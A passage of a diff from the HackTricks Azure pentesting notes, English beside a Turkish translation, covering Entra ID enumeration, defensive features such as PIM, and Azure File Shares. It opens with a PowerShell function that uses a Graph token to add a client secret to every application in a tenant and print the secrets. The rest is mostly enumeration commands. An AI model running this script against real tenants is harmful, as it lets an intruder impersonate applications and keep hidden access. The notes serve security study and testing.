> Bir Service Principal'in sahibi şifresini değiştirebilir.
<details>
<summary>List and try to add a client secret on each Enterprise App</summary>
<summary>Her Enterprise App üzerinde bir istemci sırrı listele ve eklemeyi dene</summary>
```powershell
# Just call Add-AzADAppSecret
Function Add-AzADAppSecret
{
<#
.SYNOPSIS
Add client secret to the applications.
.SYNOPSIS
Add client secret to the applications.
.PARAMETER GraphToken
Pass the Graph API Token
.PARAMETER GraphToken
Pass the Graph API Token
.EXAMPLE
PS C:\> Add-AzADAppSecret -GraphToken 'eyJ0eX..'
.EXAMPLE
PS C:\> Add-AzADAppSecret -GraphToken 'eyJ0eX..'
.LINK
https://docs.microsoft.com/en-us/graph/api/application-list?view=graph-rest-1.0&tabs=http
https://docs.microsoft.com/en-us/graph/api/application-addpassword?view=graph-rest-1.0&tabs=http
.LINK
https://docs.microsoft.com/en-us/graph/api/application-list?view=graph-rest-1.0&tabs=http
https://docs.microsoft.com/en-us/graph/api/application-addpassword?view=graph-rest-1.0&tabs=http
#>
[CmdletBinding()]
param(
[Parameter(Mandatory=$True)]
[String]
$GraphToken = $null
)
[CmdletBinding()]
param(
[Parameter(Mandatory=$True)]
[String]
$GraphToken = $null
)
$AppList = $null
$AppPassword = $null
$AppList = $null
$AppPassword = $null
# List All the Applications
# List All the Applications
$Params = @{
"URI" = "https://graph.microsoft.com/v1.0/applications"
"Method" = "GET"
"Headers" = @{
"Content-Type" = "application/json"
"Authorization" = "Bearer $GraphToken"
}
}
$Params = @{
"URI" = "https://graph.microsoft.com/v1.0/applications"
"Method" = "GET"
"Headers" = @{
"Content-Type" = "application/json"
"Authorization" = "Bearer $GraphToken"
}
}
try
{
$AppList = Invoke-RestMethod @Params -UseBasicParsing
}
catch
{
}
try
{
$AppList = Invoke-RestMethod @Params -UseBasicParsing
}
catch
{
}
# Add Password in the Application
# Add Password in the Application
if($AppList -ne $null)
{
[System.Collections.ArrayList]$Details = @()
if($AppList -ne $null)
{
[System.Collections.ArrayList]$Details = @()
foreach($App in $AppList.value)
{
$ID = $App.ID
$psobj = New-Object PSObject
foreach($App in $AppList.value)
{
$ID = $App.ID
$psobj = New-Object PSObject
$Params = @{
"URI" = "https://graph.microsoft.com/v1.0/applications/$ID/addPassword"
"Method" = "POST"
"Headers" = @{
"Content-Type" = "application/json"
"Authorization" = "Bearer $GraphToken"
}
}
$Params = @{
"URI" = "https://graph.microsoft.com/v1.0/applications/$ID/addPassword"
"Method" = "POST"
"Headers" = @{
"Content-Type" = "application/json"
"Authorization" = "Bearer $GraphToken"
}
}
$Body = @{
"passwordCredential"= @{
"displayName" = "Password"
}
}
$Body = @{
"passwordCredential"= @{
"displayName" = "Password"
}
}
try
{
$AppPassword = Invoke-RestMethod @Params -UseBasicParsing -Body ($Body | ConvertTo-Json)
Add-Member -InputObject $psobj -NotePropertyName "Object ID" -NotePropertyValue $ID
Add-Member -InputObject $psobj -NotePropertyName "App ID" -NotePropertyValue $App.appId
Add-Member -InputObject $psobj -NotePropertyName "App Name" -NotePropertyValue $App.displayName
Add-Member -InputObject $psobj -NotePropertyName "Key ID" -NotePropertyValue $AppPassword.keyId
Add-Member -InputObject $psobj -NotePropertyName "Secret" -NotePropertyValue $AppPassword.secretText
$Details.Add($psobj) | Out-Null
}
catch
{
Write-Output "Failed to add new client secret to '$($App.displayName)' Application."
}
}
if($Details -ne $null)
{
Write-Output ""
Write-Output "Client secret added to : "
Write-Output $Details | fl *
}
}
else
{
Write-Output "Failed to Enumerate the Applications."
}
try
{
$AppPassword = Invoke-RestMethod @Params -UseBasicParsing -Body ($Body | ConvertTo-Json)
Add-Member -InputObject $psobj -NotePropertyName "Object ID" -NotePropertyValue $ID
Add-Member -InputObject $psobj -NotePropertyName "App ID" -NotePropertyValue $App.appId
Add-Member -InputObject $psobj -NotePropertyName "App Name" -NotePropertyValue $App.displayName
Add-Member -InputObject $psobj -NotePropertyName "Key ID" -NotePropertyValue $AppPassword.keyId
Add-Member -InputObject $psobj -NotePropertyName "Secret" -NotePropertyValue $AppPassword.secretText
$Details.Add($psobj) | Out-Null
}
catch
{
Write-Output "Failed to add new client secret to '$($App.displayName)' Application."
}
}
if($Details -ne $null)
{
Write-Output ""
Write-Output "Client secret added to : "
Write-Output $Details | fl *
}
}
else
{
Write-Output "Failed to Enumerate the Applications."
}
}
```
</details>
### Applications
### Uygulamalar
For more information about Applications check:
Uygulamalar hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../az-basic-information/
{{#endref}}
When an App is generated 2 types of permissions are given:
Bir Uygulama oluşturulduğunda 2 tür izin verilir:
- **Permissions** given to the **Service Principal**
- **Permissions** the **app** can have and use on **behalf of the user**.
- **İzinler** **Hizmet Prensibi** için verilir
- **İzinler** **uygulamanın** **kullanıcı adına** sahip olabileceği ve kullanabileceği izinlerdir.
{{#tabs }}
{{#tab name="az cli" }}
```bash
# List Apps
az ad app list
@@ -666,11 +623,9 @@ az ad app list --show-mine
# Get apps with generated secret or certificate
az ad app list --query '[?length(keyCredentials) > `0` || length(passwordCredentials) > `0`].[displayName, appId, keyCredentials, passwordCredentials]' -o json
```
{{#endtab }}
{{#tab name="Azure AD" }}
```powershell
# List all registered applications
Get-AzureADApplication -All $true
@@ -681,11 +636,9 @@ Get-AzureADApplication -All $true | %{if(Get-AzureADApplicationPasswordCredentia
# Get owner of an application
Get-AzureADApplication -ObjectId <id> | Get-AzureADApplicationOwner |fl *
```
{{#endtab }}
{{#tab name="Az PowerShell" }}
```powershell
# Get Apps
Get-AzADApplication
@@ -696,26 +649,25 @@ Get-AzADApplication | ?{$_.DisplayName -match "app"}
# Get Apps with password
Get-AzADAppCredential
```
{{#endtab }}
{{#endtabs }}
> [!WARNING]
> An app with the permission **`AppRoleAssignment.ReadWrite`** can **escalate to Global Admin** by grating itself the role.\
> For more information [**check this**](https://posts.specterops.io/azure-privilege-escalation-via-azure-api-permissions-abuse-74aee1006f48).
> **`AppRoleAssignment.ReadWrite`** iznine sahip bir uygulama **Global Admin**'e **yükseltebilir** kendisine rol vererek.\
> Daha fazla bilgi için [**bunu kontrol et**](https://posts.specterops.io/azure-privilege-escalation-via-azure-api-permissions-abuse-74aee1006f48).
> [!NOTE]
> A secret string that the application uses to prove its identity when requesting a token is the application password.\
> So, if find this **password** you can access as the **service principal** **inside** the **tenant**.\
> Note that this password is only visible when generated (you could change it but you cannot get it again).\
> The **owner** of the **application** can **add a password** to it (so he can impersonate it).\
> Logins as these service principals are **not marked as risky** and they **won't have MFA.**
> Uygulamanın bir token talep ederken kimliğini kanıtlamak için kullandığı gizli dize uygulama şifresidir.\
> Yani, bu **şifreyi** bulursanız **tenant** içinde **service principal** olarak erişim sağlayabilirsiniz.\
> Bu şifrenin yalnızca oluşturulduğunda görünür olduğunu unutmayın (değiştirebilirsiniz ama tekrar alamazsınız).\
> **Uygulamanın** **sahibi** ona **bir şifre ekleyebilir** (böylece onu taklit edebilir).\
> Bu service principal'lar olarak girişler **riskli olarak işaretlenmez** ve **MFA'ya sahip olmayacaklardır.**
It's possible to find a list of commonly used App IDs that belongs to Microsoft in [https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications](https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications)
Microsoft'a ait yaygın olarak kullanılan App ID'lerinin bir listesini [https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications](https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications) adresinde bulmak mümkündür.
### Managed Identities
For more information about Managed Identities check:
Managed Identities hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../az-basic-information/
@@ -723,19 +675,17 @@ For more information about Managed Identities check:
{{#tabs }}
{{#tab name="az cli" }}
```bash
# List all manged identities
az identity list --output table
# With the principal ID you can continue the enumeration in service principals
```
{{#endtab }}
{{#endtabs }}
### Azure Roles
### Azure Rolleri
For more information about Azure roles check:
Azure rolleri hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../az-basic-information/
@@ -743,7 +693,6 @@ For more information about Azure roles check:
{{#tabs }}
{{#tab name="az cli" }}
```bash
# Get roles
az role definition list
@@ -765,11 +714,9 @@ az role assignment list --assignee "<email>" --all --output table
# Get all the roles assigned to a user by filtering
az role assignment list --all --query "[?principalName=='carlos@carloshacktricks.onmicrosoft.com']" --output table
```
{{#endtab }}
{{#tab name="Az PowerShell" }}
```powershell
# Get role assignments on the subscription
Get-AzRoleDefinition
@@ -779,31 +726,28 @@ Get-AzRoleDefinition -Name "Virtual Machine Command Executor"
Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com
Get-AzRoleAssignment -Scope /subscriptions/<subscription-id>/resourceGroups/<res_group_name>/providers/Microsoft.Compute/virtualMachines/<vm_name>
```
{{#endtab }}
{{#tab name="Raw" }}
```powershell
# Get permissions over a resource using ARM directly
$Token = (Get-AzAccessToken).Token
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/Research/providers/Microsoft.Compute/virtualMachines/infradminsrv/providers/Microsoft.Authorization/permissions?api-version=2015-07-01'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value
```
{{#endtab }}
{{#endtabs }}
### Entra ID Roles
### Entra ID Rolleri
For more information about Azure roles check:
Azure rolleri hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../az-basic-information/
@@ -811,55 +755,52 @@ For more information about Azure roles check:
{{#tabs }}
{{#tab name="az cli" }}
```bash
# List template Entra ID roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directoryRoleTemplates"
--uri "https://graph.microsoft.com/v1.0/directoryRoleTemplates"
# List enabled built-in Entra ID roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directoryRoles"
--uri "https://graph.microsoft.com/v1.0/directoryRoles"
# List all Entra ID roles with their permissions (including custom roles)
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions"
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions"
# List only custom Entra ID roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions" | jq '.value[] | select(.isBuiltIn == false)'
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions" | jq '.value[] | select(.isBuiltIn == false)'
# List all assigned Entra ID roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments"
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments"
# List members of a Entra ID roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directoryRoles/<role-id>/members"
--uri "https://graph.microsoft.com/v1.0/directoryRoles/<role-id>/members"
# List Entra ID roles assigned to a user
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/users/<user-id>/memberOf/microsoft.graph.directoryRole" \
--query "value[]" \
--output json
--uri "https://graph.microsoft.com/v1.0/users/<user-id>/memberOf/microsoft.graph.directoryRole" \
--query "value[]" \
--output json
# List Entra ID roles assigned to a group
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/groups/$GROUP_ID/memberOf/microsoft.graph.directoryRole" \
--query "value[]" \
--output json
--uri "https://graph.microsoft.com/v1.0/groups/$GROUP_ID/memberOf/microsoft.graph.directoryRole" \
--query "value[]" \
--output json
# List Entra ID roles assigned to a service principal
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$SP_ID/memberOf/microsoft.graph.directoryRole" \
--query "value[]" \
--output json
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$SP_ID/memberOf/microsoft.graph.directoryRole" \
--query "value[]" \
--output json
```
{{#endtab }}
{{#tab name="Azure AD" }}
```powershell
# Get all available role templates
Get-AzureADDirectoryroleTemplate
@@ -874,23 +815,19 @@ Get-AzureADDirectoryRole -ObjectId <id> | fl
# Roles of the Administrative Unit (who has permissions over the administrative unit and its members)
Get-AzureADMSScopedRoleMembership -Id <id> | fl *
```
{{#endtab }}
{{#endtabs }}
### Devices
### Cihazlar
{{#tabs }}
{{#tab name="az cli" }}
```bash
# If you know how to do this send a PR!
```
{{#endtab }}
{{#tab name="Azure AD" }}
```powershell
# Enumerate Devices
Get-AzureADDevice -All $true | fl *
@@ -909,17 +846,16 @@ Get-AzureADUserOwnedDevice -ObjectId test@corp.onmicrosoft.com
# Get Administrative Units of a device
Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember -ObjectId $_.ObjectId | where {$_.ObjectId -eq $deviceObjId} }
```
{{#endtab }}
{{#endtabs }}
> [!WARNING]
> If a device (VM) is **AzureAD joined**, users from AzureAD are going to be **able to login**.\
> Moreover, if the logged user is **Owner** of the device, he is going to be **local admin**.
> Eğer bir cihaz (VM) **AzureAD'e katılmışsa**, AzureAD'den kullanıcılar **giriş yapabilecektir**.\
> Dahası, eğer giriş yapan kullanıcı cihazın **Sahibi** ise, o **yerel yönetici** olacaktır.
### Administrative Units
### Yönetim Birimleri
For more information about administrative units check:
Yönetim birimleri hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../az-basic-information/
@@ -927,7 +863,6 @@ For more information about administrative units check:
{{#tabs }}
{{#tab name="az cli" }}
```bash
# List all administrative units
az rest --method GET --uri "https://graph.microsoft.com/v1.0/directory/administrativeUnits"
@@ -938,11 +873,9 @@ az rest --method GET --uri "https://graph.microsoft.com/v1.0/directory/administr
# Get principals with roles over the AU
az rest --method GET --uri "https://graph.microsoft.com/v1.0/directory/administrativeUnits/a76fd255-3e5e-405b-811b-da85c715ff53/scopedRoleMembers"
```
{{#endtab }}
{{#tab name="AzureAD" }}
```powershell
# Get Administrative Units
Get-AzureADMSAdministrativeUnit
@@ -954,82 +887,77 @@ Get-AzureADMSAdministrativeUnitMember -Id <id>
# Get the roles users have over the members of the AU
Get-AzureADMSScopedRoleMembership -Id <id> | fl #Get role ID and role members
```
{{#endtab }}
{{#endtabs }}
## Entra ID Privilege Escalation
## Entra ID Ayrıcalık Yükseltme
{{#ref}}
../az-privilege-escalation/az-entraid-privesc/
{{#endref}}
## Azure Privilege Escalation
## Azure Ayrıcalık Yükseltme
{{#ref}}
../az-privilege-escalation/az-authorization-privesc.md
{{#endref}}
## Defensive Mechanisms
## Savunma Mekanizmaları
### Privileged Identity Management (PIM)
### Ayrıcalıklı Kimlik Yönetimi (PIM)
Privileged Identity Management (PIM) in Azure helps to **prevent excessive privileges** to being assigned to users unnecessarily.
Azure'daki Ayrıcalıklı Kimlik Yönetimi (PIM), kullanıcıların gereksiz yere **aşırı ayrıcalıklar** almasını **önlemeye** yardımcı olur.
One of the main features provided by PIM is that It allows to not assign roles to principals that are constantly active, but make them **eligible for a period of time (e.g. 6months)**. Then, whenever the user wants to activate that role, he needs to ask for it indicating the time he needs the privilege (e.g. 3 hours). Then an **admin needs to approve** the request.\
Note that the user will also be able to ask to **extend** the time.
PIM'in sağladığı ana özelliklerden biri, sürekli aktif olan ilkelere roller atanmamasını sağlamasıdır, ancak onları **belirli bir süre (örneğin 6 ay)** için **uygun** hale getirir. Daha sonra, kullanıcı o rolü etkinleştirmek istediğinde, ihtiyaç duyduğu süreyi belirterek talep etmesi gerekir (örneğin 3 saat). Ardından, bir **yönetici talebi onaylamalıdır**.\
Kullanıcının ayrıca süreyi **uzatma** talep edebileceğini unutmayın.
Moreover, **PIM send emails** whenever a privileged role is being assigned to someone.
Ayrıca, **PIM,** ayrıcalıklı bir rol birine atandığında e-posta gönderir.
<figure><img src="../../../images/image (354).png" alt=""><figcaption></figcaption></figure>
When PIM is enabled it's possible to configure each role with certain requirements like:
PIM etkinleştirildiğinde, her rolü belirli gereksinimlerle yapılandırmak mümkündür:
- Maximum duration (hours) of activation
- Require MFA on activation
- Require Conditional Access acuthenticaiton context
- Require justification on activation
- Require ticket information on activation
- Require approval to activate
- Max time to expire the elegible assignments&#x20;
- A lot more configuration on when and who to send notifications when certain actions happen with that role
- Etkinleştirmenin maksimum süresi (saat)
- Etkinleştirme sırasında MFA gerektir
- Etkinleştirme sırasında Koşullu Erişim kimlik doğrulama bağlamı gerektir
- Etkinleştirme sırasında gerekçe gerektir
- Etkinleştirme sırasında bilet bilgisi gerektir
- Etkinleştirmek için onay gerektir
- Uygun atamaların süresinin dolması için maksimum süre
- Belirli eylemler gerçekleştiğinde bildirim göndermek için ne zaman ve kime bildirim gönderileceği hakkında daha fazla yapılandırma
### Conditional Access Policies <a href="#title-text" id="title-text"></a>
### Koşullu Erişim Politikaları <a href="#title-text" id="title-text"></a>
Check:
Kontrol et:
{{#ref}}
../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md
{{#endref}}
### Entra Identity Protection <a href="#title-text" id="title-text"></a>
### Entra Kimlik Koruma <a href="#title-text" id="title-text"></a>
Entra Identity Protection is a security service that allows to **detect when a user or a sign-in is too risky** to be accepted, allowing to **block** the user or the sig-in attempt.
Entra Kimlik Koruma, bir kullanıcının veya oturum açmanın kabul edilemeyecek kadar **riskli olduğunu tespit etmeye** olanak tanıyan bir güvenlik hizmetidir ve kullanıcının veya oturum açma girişiminin **engellenmesini** sağlar.
It allows the admin to configure it to **block** attempts when the risk is "Low and above", "Medium and above" or "High". Although, by default it's completely **disabled**:
Yönetici, riski "Düşük ve üzeri", "Orta ve üzeri" veya "Yüksek" olduğunda girişimleri **engelleyecek** şekilde yapılandırabilir. Ancak, varsayılan olarak tamamen **devre dışıdır**:
<figure><img src="../../../images/image (356).png" alt=""><figcaption></figcaption></figure>
> [!TIP]
> Nowadays it's recommended to add these restrictions via Conditional Access policies where it's possible to configure the same options.
> Günümüzde, aynı seçenekleri yapılandırmanın mümkün olduğu Koşullu Erişim politikaları aracılığıyla bu kısıtlamaların eklenmesi önerilmektedir.
### Entra Password Protection
### Entra Şifre Koruma
Entra Password Protection ([https://portal.azure.com/#view/Microsoft_AAD_ConditionalAccess/PasswordProtectionBlade](https://portal.azure.com/#view/Microsoft_AAD_ConditionalAccess/PasswordProtectionBlade)) is a security feature that **helps prevent the abuse of weak passwords in by locking out accounts when several unsuccessful login attempts happen**.\
It also allows to **ban a custom password list** that you need to provide.
Entra Şifre Koruma ([https://portal.azure.com/#view/Microsoft_AAD_ConditionalAccess/PasswordProtectionBlade](https://portal.azure.com/#view/Microsoft_AAD_ConditionalAccess/PasswordProtectionBlade)), **birden fazla başarısız girişim olduğunda hesapları kilitleyerek zayıf şifrelerin kötüye kullanılmasını önlemeye yardımcı olan** bir güvenlik özelliğidir.\
Ayrıca, sağlamanız gereken **özel bir şifre listesini yasaklama** olanağı da sunar.
It can be **applied both** at the cloud level and on-premises Active Directory.
Bu, hem bulut düzeyinde hem de yerel Active Directory'de **uygulanabilir**.
The default mode is **Audit**:
Varsayılan mod **Denetim**'dir:
<figure><img src="../../../images/image (355).png" alt=""><figcaption></figcaption></figure>
## References
## Referanslar
- [https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units](https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units)
{{#include ../../../banners/hacktricks-training.md}}

88
src/pentesting-cloud/azure-security/az-services/az-file-shares.md
View File

@@ -2,37 +2,36 @@
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
**Azure Files** is a fully managed cloud file storage service that provides shared file storage accessible via standard **SMB (Server Message Block)** and **NFS (Network File System)** protocols. Although the main protocol used is SMB as NFS Azure file shares aren't supported for Windows (according to the [**docs**](https://learn.microsoft.com/en-us/azure/storage/files/files-nfs-protocol)). It allows you to create highly available network file shares that can be accessed simultaneously by multiple virtual machines (VMs) or on-premises systems, enabling seamless file sharing across environments.
**Azure Files**, standart **SMB (Server Message Block)** ve **NFS (Network File System)** protokolleri aracılığıyla erişilebilen paylaşımlı dosya depolama sağlayan tamamen yönetilen bir bulut dosya depolama hizmetidir. Kullanılan ana protokol SMB olmasına rağmen, NFS Azure dosya paylaşımları Windows için desteklenmemektedir (bkz. [**docs**](https://learn.microsoft.com/en-us/azure/storage/files/files-nfs-protocol)). Birden fazla sanal makine (VM) veya yerel sistemler tarafından aynı anda erişilebilen yüksek kullanılabilirliğe sahip ağ dosya paylaşımları oluşturmanıza olanak tanır ve ortamlar arasında kesintisiz dosya paylaşımını sağlar.
### Access Tiers
### Erişim Katmanları
- **Transaction Optimized**: Optimized for transaction-heavy operations.
- **Hot**: Balanced between transactions and storage.
- **Cool**: Cost-effective for storage.
- **Premium:** High-performance file storage optimized for low-latency and IOPS-intensive workloads.
- **İşlem Optimizasyonu**: İşlem yoğun operasyonlar için optimize edilmiştir.
- **Sıcak**: İşlemler ve depolama arasında dengeli.
- **Soğuk**: Depolama için maliyet etkin.
- **Premium:** Düşük gecikme süresi ve IOPS yoğun iş yükleri için optimize edilmiş yüksek performanslı dosya depolama.
### Backups
### Yedeklemeler
- **Daily backup**: A backup point is created each day at an indicated time (e.g. 19.30 UTC) and stored for from 1 to 200 days.
- **Weekly backup**: A backup point is created each week at an indicated day and time (Sunday at 19.30) and stored for from 1 to 200 weeks.
- **Monthly backup**: A backup point is created each month at an indicated day and time (e.g. first Sunday at 19.30) and stored for from 1 to 120 months.
- **Yearly backup**: A backup point is created each year at an indicated day and time (e.g. January first Sunday at 19.30) and stored for from 1 to 10 years.
- It's also possible to perform **manual backups and snapshots at any time**. Backups and snapshots are actually the same in this context.
- **Günlük yedekleme**: Her gün belirtilen bir saatte (örneğin, 19.30 UTC) bir yedekleme noktası oluşturulur ve 1 ila 200 gün arasında saklanır.
- **Haftalık yedekleme**: Her hafta belirtilen bir gün ve saatte (Pazar günü 19.30) bir yedekleme noktası oluşturulur ve 1 ila 200 hafta arasında saklanır.
- **Aylık yedekleme**: Her ay belirtilen bir gün ve saatte (örneğin, ilk Pazar 19.30) bir yedekleme noktası oluşturulur ve 1 ila 120 ay arasında saklanır.
- **Yıllık yedekleme**: Her yıl belirtilen bir gün ve saatte (örneğin, Ocak ayının ilk Pazar günü 19.30) bir yedekleme noktası oluşturulur ve 1 ila 10 yıl arasında saklanır.
- Ayrıca, **herhangi bir zamanda manuel yedeklemeler ve anlık görüntüler** almak da mümkündür. Yedeklemeler ve anlık görüntüler bu bağlamda aslında aynıdır.
### Supported Authentications via SMB
### SMB Üzerinden Desteklenen Kimlik Doğrulamaları
- **On-premises AD DS Authentication**: It uses on-premises Active Directory credentials synced with Microsoft Entra ID for identity-based access. It requires network connectivity to on-premises AD DS.
- **Microsoft Entra Domain Services Authentication**: It leverages Microsoft Entra Domain Services (cloud-based AD) to provide access using Microsoft Entra credentials.
- **Microsoft Entra Kerberos for Hybrid Identities**: It enables Microsoft Entra users to authenticate Azure file shares over the internet using Kerberos. It supports hybrid Microsoft Entra joined or Microsoft Entra joined VMs without requiring connectivity to on-premises domain controllers. But it does not support cloud-only identities.
- **AD Kerberos Authentication for Linux Clients**: It allows Linux clients to use Kerberos for SMB authentication via on-premises AD DS or Microsoft Entra Domain Services.
- **Yerel AD DS Kimlik Doğrulaması**: Kimlik tabanlı erişim için Microsoft Entra ID ile senkronize edilmiş yerel Active Directory kimlik bilgilerini kullanır. Yerel AD DS'ye ağ bağlantısı gerektirir.
- **Microsoft Entra Alan Hizmetleri Kimlik Doğrulaması**: Microsoft Entra kimlik bilgilerini kullanarak erişim sağlamak için Microsoft Entra Alan Hizmetleri'ni (bulut tabanlı AD) kullanır.
- **Hibrit Kimlikler için Microsoft Entra Kerberos**: Microsoft Entra kullanıcılarının Kerberos kullanarak Azure dosya paylaşımlarını internet üzerinden kimlik doğrulamasına olanak tanır. Yerel etki alanı denetleyicilerine bağlantı gerektirmeden hibrit Microsoft Entra katılmış veya Microsoft Entra katılmış VM'leri destekler. Ancak yalnızca bulut kimliklerini desteklemez.
- **Linux İstemcileri için AD Kerberos Kimlik Doğrulaması**: Linux istemcilerinin yerel AD DS veya Microsoft Entra Alan Hizmetleri aracılığıyla SMB kimlik doğrulamasıin Kerberos kullanmasına olanak tanır.
## Enumeration
{{#tabs}}
{{#tab name="az cli"}}
```bash
# Get storage accounts
az storage account list #Get the account name from here
@@ -54,11 +53,9 @@ az storage file list --account-name <name> --share-name <share-name> --snapshot
# Download snapshot/backup
az storage file download-batch -d . --account-name <name> --source <share-name> --snapshot <snapshot-version>
```
{{#endtab}}
{{#tab name="Az PowerShell"}}
```powershell
Get-AzStorageAccount
@@ -79,98 +76,87 @@ Get-AzStorageShare -Context (Get-AzStorageAccount -ResourceGroupName "<resource-
Get-AzStorageFile -ShareName "<share-name>" -Context (New-AzStorageContext -StorageAccountName "<storage-account-name>" -StorageAccountKey (Get-AzStorageAccountKey -ResourceGroupName "<resource-group-name>" -Name "<storage-account-name>" | Select-Object -ExpandProperty Value) -SnapshotTime "<snapshot-version>")
```
{{#endtab}}
{{#endtabs}}
> [!NOTE]
> By default `az` cli will use an account key to sign a key and perform the action. To use the Entra ID principal privileges use the parameters `--auth-mode login --enable-file-backup-request-intent`.
> Varsayılan olarak `az` cli, bir anahtarı imzalamak ve işlemi gerçekleştirmek için bir hesap anahtarı kullanacaktır. Entra ID anahtar ayrıcalıklarını kullanmak için `--auth-mode login --enable-file-backup-request-intent` parametrelerini kullanın.
> [!TIP]
> Use the param `--account-key` to indicate the account key to use\
> Use the param `--sas-token` with the SAS token to access via a SAS token
> Kullanılacak hesap anahtarını belirtmek için `--account-key` parametresini kullanın\
> SAS token ile erişmek için `--sas-token` parametresini SAS token ile kullanın
### Connection
### Bağlantı
These are the scripts proposed by Azure at the time of the writing to connect a File Share:
Yazma anında Azure tarafından önerilen File Share'e bağlanmak için bu betikler bulunmaktadır:
You need to replace the `<STORAGE-ACCOUNT>`, `<ACCESS-KEY>` and `<FILE-SHARE-NAME>` placeholders.
`<STORAGE-ACCOUNT>`, `<ACCESS-KEY>` ve `<FILE-SHARE-NAME>` yer tutucularını değiştirmeniz gerekmektedir.
{{#tabs}}
{{#tab name="Windows"}}
```powershell
$connectTestResult = Test-NetConnection -ComputerName filescontainersrdtfgvhb.file.core.windows.net -Port 445
if ($connectTestResult.TcpTestSucceeded) {
# Save the password so the drive will persist on reboot
cmd.exe /C "cmdkey /add:`"<STORAGE-ACCOUNT>.file.core.windows.net`" /user:`"localhost\<STORAGE-ACCOUNT>`" /pass:`"<ACCESS-KEY>`""
# Mount the drive
New-PSDrive -Name Z -PSProvider FileSystem -Root "\\<STORAGE-ACCOUNT>.file.core.windows.net\<FILE-SHARE-NAME>" -Persist
# Save the password so the drive will persist on reboot
cmd.exe /C "cmdkey /add:`"<STORAGE-ACCOUNT>.file.core.windows.net`" /user:`"localhost\<STORAGE-ACCOUNT>`" /pass:`"<ACCESS-KEY>`""
# Mount the drive
New-PSDrive -Name Z -PSProvider FileSystem -Root "\\<STORAGE-ACCOUNT>.file.core.windows.net\<FILE-SHARE-NAME>" -Persist
} else {
Write-Error -Message "Unable to reach the Azure storage account via port 445. Check to make sure your organization or ISP is not blocking port 445, or use Azure P2S VPN, Azure S2S VPN, or Express Route to tunnel SMB traffic over a different port."
Write-Error -Message "Unable to reach the Azure storage account via port 445. Check to make sure your organization or ISP is not blocking port 445, or use Azure P2S VPN, Azure S2S VPN, or Express Route to tunnel SMB traffic over a different port."
}
```
{{#endtab}}
{{#tab name="Linux"}}
```bash
sudo mkdir /mnt/disk-shareeifrube
if [ ! -d "/etc/smbcredentials" ]; then
sudo mkdir /etc/smbcredentials
fi
if [ ! -f "/etc/smbcredentials/<STORAGE-ACCOUNT>.cred" ]; then
sudo bash -c 'echo "username=<STORAGE-ACCOUNT>" >> /etc/smbcredentials/<STORAGE-ACCOUNT>.cred'
sudo bash -c 'echo "password=<ACCESS-KEY>" >> /etc/smbcredentials/<STORAGE-ACCOUNT>.cred'
sudo bash -c 'echo "username=<STORAGE-ACCOUNT>" >> /etc/smbcredentials/<STORAGE-ACCOUNT>.cred'
sudo bash -c 'echo "password=<ACCESS-KEY>" >> /etc/smbcredentials/<STORAGE-ACCOUNT>.cred'
fi
sudo chmod 600 /etc/smbcredentials/<STORAGE-ACCOUNT>.cred
sudo bash -c 'echo "//<STORAGE-ACCOUNT>.file.core.windows.net/<FILE-SHARE-NAME> /mnt/<FILE-SHARE-NAME> cifs nofail,credentials=/etc/smbcredentials/<STORAGE-ACCOUNT>.cred,dir_mode=0777,file_mode=0777,serverino,nosharesock,actimeo=30" >> /etc/fstab'
sudo mount -t cifs //<STORAGE-ACCOUNT>.file.core.windows.net/<FILE-SHARE-NAME> /mnt/<FILE-SHARE-NAME> -o credentials=/etc/smbcredentials/<STORAGE-ACCOUNT>.cred,dir_mode=0777,file_mode=0777,serverino,nosharesock,actimeo=30
```
{{#endtab}}
{{#tab name="macOS"}}
```bash
open smb://<STORAGE-ACCOUNT>:<ACCESS-KEY>@<STORAGE-ACCOUNT>.file.core.windows.net/<FILE-SHARE-NAME>
```
{{#endtab}}
{{#endtabs}}
### Regular storage enumeration (access keys, SAS...)
### Düzenli depolama numaralandırması (erişim anahtarları, SAS...)
{{#ref}}
az-storage.md
{{#endref}}
## Privilege Escalation
## Yetki Yükseltme
Same as storage privesc:
Depolama yetki yükseltmesi ile aynı:
{{#ref}}
../az-privilege-escalation/az-storage-privesc.md
{{#endref}}
## Post Exploitation
## İstismar Sonrası
{{#ref}}
../az-post-exploitation/az-file-share-post-exploitation.md
{{#endref}}
